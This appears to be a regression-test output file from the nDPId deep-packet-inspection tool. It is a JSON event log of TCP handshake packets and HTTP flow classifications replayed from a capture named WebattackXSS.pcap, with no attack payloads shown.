+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5975,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":422,"flow_packet_id":2,"flow_last_seen":1499347680746,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347680746,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6YpeBd3IjCwJbKAScSCNfgAAAgQFtAQCCAoD5XG8ATugRwEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5976,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":422,"flow_packet_id":3,"flow_last_seen":1499347680747,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347680747,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0qS1AAD4GHKusEAABwKgKMumKAFCMLAlsXgXdyYAQAOUshgAAAQEICgE7oEcD5XG8"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5989,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347683313,"flow_last_seen":1499347683313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347683313,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59812,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5989,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":423,"flow_packet_id":1,"flow_last_seen":1499347683313,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347683313,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8x61AAD4G\/iKsEAABwKgKMumkAFCTI2VlAAAAAKACchDYggAAAgQFtAQCCAoBO6LIAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5990,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":423,"flow_packet_id":2,"flow_last_seen":1499347683313,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347683313,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6aQ4uuFckyNlZqAScSBHKAAAAgQFtAQCCAoD5XQ9ATuiyAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5992,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":423,"flow_packet_id":3,"flow_last_seen":1499347683314,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347683314,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0x65AAD4G\/imsEAABwKgKMumkAFCTI2VmOLrhXYAQAOXmLgAAAQEICgE7oskD5XQ9"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6001,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347684563,"flow_last_seen":1499347684563,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347684563,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59826,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6001,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":424,"flow_packet_id":1,"flow_last_seen":1499347684563,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347684563,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82yNAAD4G6qysEAABwKgKMumyAFDf7X8iAAAAAKACchBwtAAAAgQFtAQCCAoBO6QBAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6002,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":424,"flow_packet_id":2,"flow_last_seen":1499347684563,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347684563,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6bLDIQ3O3+1\/I6AScSAnSAAAAgQFtAQCCAoD5XV2ATukAQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6003,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":424,"flow_packet_id":3,"flow_last_seen":1499347684564,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347684564,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02yRAAD4G6rOsEAABwKgKMumyAFDf7X8jwyENz4AQAOXGTwAAAQEICgE7pAED5XV2"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6022,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347687089,"flow_last_seen":1499347687089,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347687089,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59852,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6022,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":425,"flow_packet_id":1,"flow_last_seen":1499347687089,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347687089,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UahAAD4GdCisEAABwKgKMunMAFBn2\/fQAAAAAKACchBthwAAAgQFtAQCCAoBO6Z4AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6023,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":425,"flow_packet_id":2,"flow_last_seen":1499347687089,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347687089,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6cx2j8kIZ9v30aAScSCy+wAAAgQFtAQCCAoD5XftATumeAEDAwc="} 
+00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6024,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":425,"flow_packet_id":3,"flow_last_seen":1499347687090,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347687090,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UalAAD4GdC+sEAABwKgKMunMAFBn2\/fRdo\/JCYAQAOVSAgAAAQEICgE7pnkD5Xft"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6031,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347688364,"flow_last_seen":1499347688364,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688364,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59866,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6031,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":426,"flow_packet_id":1,"flow_last_seen":1499347688364,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347688364,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8C45AAD4GukKsEAABwKgKMunaAFB\/Haw5AAAAAKACchCgjwAAAgQFtAQCCAoBO6e3AAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6032,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":426,"flow_packet_id":2,"flow_last_seen":1499347688365,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347688365,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6dpm6d+Cfx2sOqAScSDd8AAAAgQFtAQCCAoD5XksATuntwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6033,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":426,"flow_packet_id":3,"flow_last_seen":1499347688365,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347688365,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0C49AAD4GukmsEAABwKgKMunaAFB\/Haw6Zunfg4AQAOV8+AAAAQEICgE7p7cD5Xks"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347555255,"flow_last_seen":1499347560767,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58440,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347555255,"flow_last_seen":1499347560767,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58440,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347556523,"flow_last_seen":1499347561767,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58454,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347556523,"flow_last_seen":1499347561767,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58454,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347557789,"flow_last_seen":1499347563767,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58468,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347557789,"flow_last_seen":1499347563767,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58468,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347559043,"flow_last_seen":1499347564768,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58482,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347559043,"flow_last_seen":1499347564768,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58482,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347560327,"flow_last_seen":1499347565768,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58496,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347560327,"flow_last_seen":1499347565768,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58496,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347561622,"flow_last_seen":1499347566770,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58510,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347561622,"flow_last_seen":1499347566770,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58510,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6044,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347689613,"flow_last_seen":1499347689613,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347689613,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59880,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6044,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":427,"flow_packet_id":1,"flow_last_seen":1499347689613,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347689613,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80NlAAD4G9PasEAABwKgKMunoAFDCAng2AAAAAKACchCQZwAAAgQFtAQCCAoBO6jvAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":427,"flow_packet_id":2,"flow_last_seen":1499347689613,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347689613,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6egCgzyzwgJ4N6AScSDTxgAAAgQFtAQCCAoD5XpkATuo7wEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6046,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":427,"flow_packet_id":3,"flow_last_seen":1499347689614,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347689614,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00NpAAD4G9P2sEAABwKgKMunoAFDCAng3AoM8tIAQAOVyzQAAAQEICgE7qPAD5Xpk"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6061,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347692128,"flow_last_seen":1499347692128,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347692128,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59906,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6061,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":428,"flow_packet_id":1,"flow_last_seen":1499347692128,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347692128,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8u5xAAD4GCjSsEAABwKgKMuoCAFDepxD4AAAAAKACchDYcQAAAgQFtAQCCAoBO6tkAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6062,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":428,"flow_packet_id":2,"flow_last_seen":1499347692128,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347692128,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6gK6r2Hi3qcQ+aAScSA8AAAAAgQFtAQCCAoD5XzZATurZAEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6063,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":428,"flow_packet_id":3,"flow_last_seen":1499347692128,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347692128,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0u51AAD4GCjusEAABwKgKMuoCAFDepxD5uq9h44AQAOXbBwAAAQEICgE7q2QD5XzZ"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6073,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347693386,"flow_last_seen":1499347693386,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347693386,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59920,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6073,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":429,"flow_packet_id":1,"flow_last_seen":1499347693386,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347693386,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8yJFAAD4G\/T6sEAABwKgKMuoQAFBhE2QOAAAAAKACchABpwAAAgQFtAQCCAoBO6yfAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6074,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":429,"flow_packet_id":2,"flow_last_seen":1499347693386,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347693386,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6hDs1hgmYRNkD6AScSB7jwAAAgQFtAQCCAoD5X4UATusnwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6075,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":429,"flow_packet_id":3,"flow_last_seen":1499347693387,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347693387,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0yJJAAD4G\/UWsEAABwKgKMuoQAFBhE2QP7NYYJ4AQAOUalwAAAQEICgE7rJ8D5X4U"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6085,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347694661,"flow_last_seen":1499347694661,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347694661,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59934,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6085,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":430,"flow_packet_id":1,"flow_last_seen":1499347694661,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347694661,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8mmhAAD4GK2isEAABwKgKMuoeAFATaje1AAAAAKACchB6XQAAAgQFtAQCCAoBO63dAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6086,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":430,"flow_packet_id":2,"flow_last_seen":1499347694661,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347694661,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6h4IeSXoE2o3tqAScSDJowAAAgQFtAQCCAoD5X9SATut3QEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6087,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":430,"flow_packet_id":3,"flow_last_seen":1499347694661,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347694661,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0mmlAAD4GK2+sEAABwKgKMuoeAFATaje2CHkl6YAQAOVoqgAAAQEICgE7rd4D5X9S"} 
